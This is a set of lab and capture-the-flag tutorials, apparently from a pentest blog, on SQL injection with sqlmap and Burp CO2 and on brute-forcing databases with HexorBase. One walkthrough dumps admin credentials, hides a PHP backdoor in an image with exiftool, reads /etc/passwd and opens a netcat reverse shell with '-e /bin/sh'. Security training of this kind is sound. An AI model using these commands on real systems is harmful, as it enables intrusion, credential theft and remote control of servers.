Easy way to Hack Database using Wizard switch in Sqlmap

Sqlmap provides wizard options for beiggner  and save your much time. So start your kali Linux and open the terminal and now the following command to use wizard interface of sqlmap.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 1 for normal; to select the injection difficulty. Now again type 1 for basic enumeration.

It will automatically dump the basic detail of backend server. Here you can see from the given screenshot it shown that web application technology is nginx , PHP 5.3.10 and operating system is Linux Ubuntu and many more things. 

Now change level for penetration testing of web with sqlmap wizard. Again type the same command.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" –wizard

Type 2 for medium; to select the injection difficulty. Now again type 2 for intermidate enumeration.

 Wonderful!!!  We have got database name and all table names with columns.

Now again change level for penetration testing of web with sqlmap wizard. Repeat the same command.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" –wizard

Type 3 for hard; to select the injection difficulty. Now again type 3 for All enumeration.

Awesome within three steps we have got entire information of acurat database. You can see the result from the screenshot.

Here we have all tables with its field details and column details.

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Hello friends!! Today we are going to solve another CTF challenge “From SQL injection to Shell II” and you can read part 1 form here. This VM is developed by Pentester Lab.  You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/

Install the iso image in VM ware and start it. The task given in this lab is to gain access of administration console and upload PHP webshell.

Level: Intermidate

Penetrating Methodologies

§  Network Scanning (Nmap)

§  Vulnerable to Blind Time-Base SQL Injection

§  Exploiting SQL Injection (SQLMAP)

§  Hiding web shell inside Image (exiftool)

§  Uploading Web shell

§  Spawning Shell (Netcat)

Walkthrough

The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.

nmap -A 192.168.1.102

Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on test.

The given URL: http://192.168.1.102/cat.php?id=1 will run sql query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding(‘) apostrophe at last of URL:

Unfortunately this page is not vulnerable to error base SQL injection as author already mention here you will learn “Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell”

Then I had used acunetix to scan the target which has declared the level of threat is high for blind sql injection.

Hence it is clear that exploit the target through sql injection.

And after little more research work I found the way to exploit it using sqlmap.

sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” --dbs --dump-all--batch

If you remembered the title of web page was “An Awesome Photoblog” hence name of database must be photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” -D photoblog --dump-all--batch

Now try to use above credential to access administration console, again open target IP: 192.168.0.105 in browser and click on login tab and type login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now last task is to upload PHP webshell. Under administration console you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload image.

I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.

Then I use exiftool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image “1.png” and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.

Now type command for exiftool to hide malicious code of php file inside the png image.

cd Desktop

exiftool “-comment<= simple-backdoor.php” 1.png

exiftool 1.png

As you can observe, the malicious code is hidden inside the image. 

Now I had browse 1.png to add it as new image which is our php webshell.

Our malicious file successfully uploaded on web server. You can see a new row is added as webshell php which contains our php backdoor, now click on backdoor.

Yuppie we have uploaded the image with hidden backdoor inside, now try execute it.

After inspecting its source code we found link uploaded image, now let’s try to open it.

As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.  

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/password

And you can observe, we have successfully pulled the passwd file successfully, hence now can spwan victim’s shell through it.

Let’s run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.

nc -lvp 1234

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/sh

Superb!!! We completed our last challenge also here we have spawned victim web shell.

SQL Injection Exploitation in Multiple Targets using Sqlmap

In this article we are going to perform sql injection attack on multiple target through sqlmap

In the tutorial I had used two buggy web dvwa and Acurat (vulweb.com). 

Start dvwa  and select sql injection vulnerbility here type user ID and click on submit, now copy the url.

Start kali linux then create a text file as sql.txt on desktop which will contain URL for multiple target and past copied url in text file. From the screenshot you can perceive that I had pasted above url in this text file and save as sql.txt

Repeat the same process with different web. Now open the vulnweb.com, here click on URL given for Acuart.

Now click on browse categories then click on poster

Now let verify whether the ID is vulnerable to sql injection or not. Use this apostrophe (‘) at the end of url as shown in the screenshot. You can see I have received an error message which means the ID is vulnerable to sql injection. Copy its URL

Paste above copied URL under sql.txt, and save it again. So here I have saved two URL in a text file which means two vulnerable ID of different web is saved under sql.txt file.

Open the terminal and type following command to scan multiple targets through sqlmap for sql injection.

Sqlmap –m /root/Desktop/sql.txt –dbs --batch

So here you can see I have got database names for multiple targets.  Here I found dvwa under database names.

Later I have got another database name acurat. Now try yourself for multiple ID.

Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin)

Burp CO2 is an extension for the popular web proxy / web application testing tool called Burp Suite, available at Portswigger. You must install Burp Suite before installing the Burp CO2 extension. The CO2 extension includes a variety of functionality to enhance certain web penetration test tasks, such as an interface to make interacting with SQLMap more efficient and less error-prone, various tools for generating lists of users, a Laudanum exploitation shell implementation, and even a word masher for generating passwords.

For more details read from here burpco2.com

In this is article I will show you how to obtain sqlmap command through burp suit for sql injection.

Start burp suit andClick on Extender tag then click on BApp store which cantains burp extensions  to extend burp’s capabilities.

Now select CO2 and click on install button available on the right sideof the frame.

From the given screenshot you can see the extension CO2 has added on menu bar now click on CO2 and then choose SQLMapper tool.

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: ‘in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  

Go to burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers.

Now right click on its window and you will see a list of many actions will have been opened then select option send to SQLMapper.

When the fetched data will sent to sqlmapper it will automatically itself generates sqlmap command using referrer and cookie.

Here you can see options box at the end of burp suite frame. Now click on enumeration tag and select the checkboxes for database, tables, columns, users and passwords.

Now copy the sqlmap command from text field and run this command manually on terminal using sqlmap.

Open the terminal and paste above command in front of “sqlmap” as shown in the screenshot. Now run this command to fetch information of database.

From this tutorial it is clear how to generate sqlmap command through burp suit for sql injection. Now from last image you can see it starts dumping the data.

Brute Forcing Multiple Databases using HexorBase

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

To run hexorbase in kali Linux  click application > database assessment > hexorbase

Another way, open the terminal and type hexorbase.

It will open graphical interface for hexorbase as given in the screenshot. It is the collection of several database servers where you can apply brute force attack on desired server.

Now to start brute force attack, first you need to create an account. In the middle you can see administration panel here type username and password according to your wills. I had type admin: pass as username and password this will allow me to start brute force attack using hexor on desired backend server.

Now choose your database type. I have selected MY SQL for brute force attack.

Now follow few steps for brute force attack on server.

·         Type target IP: 192.168.1.104 under database connection.

·         Now click on user list for dictionary attack option and select a dictionary of username.

·         Repeat the above step for word list to select password list.

·         Finally click on lunch attack to start brute force attack.

Now it will try to match the combination of username and password on target IP. After sometime when the process is completed 100% you will get matched combination as result. You can perceive from screenshot that I have got username and password combination as msfadmin:msfadmin for MYSQL server.